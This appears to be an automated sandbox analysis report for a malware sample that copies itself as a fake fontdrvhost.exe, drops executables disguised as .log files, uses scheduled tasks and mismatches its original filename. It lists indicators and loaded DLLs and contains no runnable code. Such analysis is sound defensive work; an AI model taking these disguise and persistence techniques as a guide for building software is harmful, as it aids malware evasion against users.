Source: ZT3pxe2Tb4.exe, 00000000.00000002.1647722543.0000000003A79000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000008.00000002.1704980568.0000000003102000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1796124572.00000000035D7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.1883168171.0000000003347000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1932041291.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000022.00000002.2017458339.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2120982731.00000000033F7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2116613612.0000000003855000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2490608916.000000000363C000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2251980191.0000000002F84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Detected potential crypto function
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BA10DA8 0_2_00007FFD9BA10DA8
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD7444 0_2_00007FFD9BBD7444
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD7384 0_2_00007FFD9BBD7384
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD5A00 0_2_00007FFD9BBD5A00
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBC09BE 0_2_00007FFD9BBC09BE
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD6179 0_2_00007FFD9BBD6179
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD4978 0_2_00007FFD9BBD4978
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBC000A 0_2_00007FFD9BBC000A
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD4F51 0_2_00007FFD9BBD4F51
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD3600 0_2_00007FFD9BBD3600
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD761C 0_2_00007FFD9BBD761C
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD55D4 0_2_00007FFD9BBD55D4
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD4D31 0_2_00007FFD9BBD4D31
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD4D12 0_2_00007FFD9BBD4D12
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD4CA1 0_2_00007FFD9BBD4CA1
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9BBD6C80 0_2_00007FFD9BBD6C80
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 0_2_00007FFD9C0F78B0 0_2_00007FFD9C0F78B0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9B9F0DA8 8_2_00007FFD9B9F0DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB4BF2 8_2_00007FFD9BBB4BF2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB5A00 8_2_00007FFD9BBB5A00
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBA09BE 8_2_00007FFD9BBA09BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB4978 8_2_00007FFD9BBB4978
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBA000A 8_2_00007FFD9BBA000A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB5E82 8_2_00007FFD9BBB5E82
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB3600 8_2_00007FFD9BBB3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB55D3 8_2_00007FFD9BBB55D3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB6590 8_2_00007FFD9BBB6590
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB34F3 8_2_00007FFD9BBB34F3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB4CF2 8_2_00007FFD9BBB4CF2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 8_2_00007FFD9BBB6C80 8_2_00007FFD9BBB6C80
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA2B7ED 9_2_00007FFD9BA2B7ED
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA10DA8 9_2_00007FFD9BA10DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA1F562 9_2_00007FFD9BA1F562
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA69EB8 9_2_00007FFD9BA69EB8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 9_2_00007FFD9BA2D344 9_2_00007FFD9BA2D344
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9BA20DA8 14_2_00007FFD9BA20DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9BBD09BE 14_2_00007FFD9BBD09BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9BBD000A 14_2_00007FFD9BBD000A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9BBE3600 14_2_00007FFD9BBE3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 14_2_00007FFD9C1078B0 14_2_00007FFD9C1078B0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA0B7ED 21_2_00007FFD9BA0B7ED
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9B9F0DA8 21_2_00007FFD9B9F0DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9B9FF562 21_2_00007FFD9B9FF562
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA49EB8 21_2_00007FFD9BA49EB8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBA09BE 21_2_00007FFD9BBA09BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBB4978 21_2_00007FFD9BBB4978
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBA000A 21_2_00007FFD9BBA000A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBB3600 21_2_00007FFD9BBB3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBB34F3 21_2_00007FFD9BBB34F3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBC2C24 21_2_00007FFD9BBC2C24
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBC13D8 21_2_00007FFD9BBC13D8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBC16F2 21_2_00007FFD9BBC16F2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BBC82C8 21_2_00007FFD9BBC82C8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C0FE8A1 21_2_00007FFD9C0FE8A1
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C0DB66F 21_2_00007FFD9C0DB66F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C10B9CA 21_2_00007FFD9C10B9CA
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C10CE22 21_2_00007FFD9C10CE22
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9C10B24D 21_2_00007FFD9C10B24D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 21_2_00007FFD9BA0D344 21_2_00007FFD9BA0D344
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BA00DA8 27_2_00007FFD9BA00DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC5A00 27_2_00007FFD9BBC5A00
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBB09BE 27_2_00007FFD9BBB09BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC4978 27_2_00007FFD9BBC4978
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBB000A 27_2_00007FFD9BBB000A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC4F4F 27_2_00007FFD9BBC4F4F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC3600 27_2_00007FFD9BBC3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC55D4 27_2_00007FFD9BBC55D4
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC4D2F 27_2_00007FFD9BBC4D2F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC34F3 27_2_00007FFD9BBC34F3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC4D0F 27_2_00007FFD9BBC4D0F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC4C9F 27_2_00007FFD9BBC4C9F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9BBC6C80 27_2_00007FFD9BBC6C80
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9C0E78B0 27_2_00007FFD9C0E78B0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 27_2_00007FFD9C0E3518 27_2_00007FFD9C0E3518
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9B9E0DA8 34_2_00007FFD9B9E0DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA4BF2 34_2_00007FFD9BBA4BF2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA5A00 34_2_00007FFD9BBA5A00
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BB909BE 34_2_00007FFD9BB909BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA4978 34_2_00007FFD9BBA4978
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA5E82 34_2_00007FFD9BBA5E82
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA3600 34_2_00007FFD9BBA3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA55D3 34_2_00007FFD9BBA55D3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA4CF2 34_2_00007FFD9BBA4CF2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9BBA34F3 34_2_00007FFD9BBA34F3
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 34_2_00007FFD9C0C78B0 34_2_00007FFD9C0C78B0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA2B7ED 35_2_00007FFD9BA2B7ED
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA1F562 35_2_00007FFD9BA1F562
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA10DA8 35_2_00007FFD9BA10DA8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA69EB8 35_2_00007FFD9BA69EB8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBC09BE 35_2_00007FFD9BBC09BE
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBD4978 35_2_00007FFD9BBD4978
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBC000A 35_2_00007FFD9BBC000A
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBD3600 35_2_00007FFD9BBD3600
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBD4D31 35_2_00007FFD9BBD4D31
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBD4D12 35_2_00007FFD9BBD4D12
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBD4CA1 35_2_00007FFD9BBD4CA1
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE23E0 35_2_00007FFD9BBE23E0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE13D8 35_2_00007FFD9BBE13D8
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE23CF 35_2_00007FFD9BBE23CF
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE82E1 35_2_00007FFD9BBE82E1
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BBE16F2 35_2_00007FFD9BBE16F2
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C0F78B0 35_2_00007FFD9C0F78B0
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C0FB66F 35_2_00007FFD9C0FB66F
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C12B9CA 35_2_00007FFD9C12B9CA
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C12CE22 35_2_00007FFD9C12CE22
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C12B24D 35_2_00007FFD9C12B24D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9C11E8A1 35_2_00007FFD9C11E8A1
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 35_2_00007FFD9BA2D344 35_2_00007FFD9BA2D344
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AFOsBjYP.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AaPSReOe.log F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
PE file contains executable resources (Code or Archives)
Source: DnshUSLJ.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: tAOrkGQb.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: SKewgrff.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: IbKgwPay.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: zsrQNmVQ.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: pJXAdKPi.log.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Sample file is different than original file name gathered from version info
Source: ZT3pxe2Tb4.exe, 00000000.00000002.1670366434.000000001BFAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ZT3pxe2Tb4.exe
Source: ZT3pxe2Tb4.exe, 00000000.00000000.1607054032.0000000000D64000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ZT3pxe2Tb4.exe
Source: ZT3pxe2Tb4.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ZT3pxe2Tb4.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
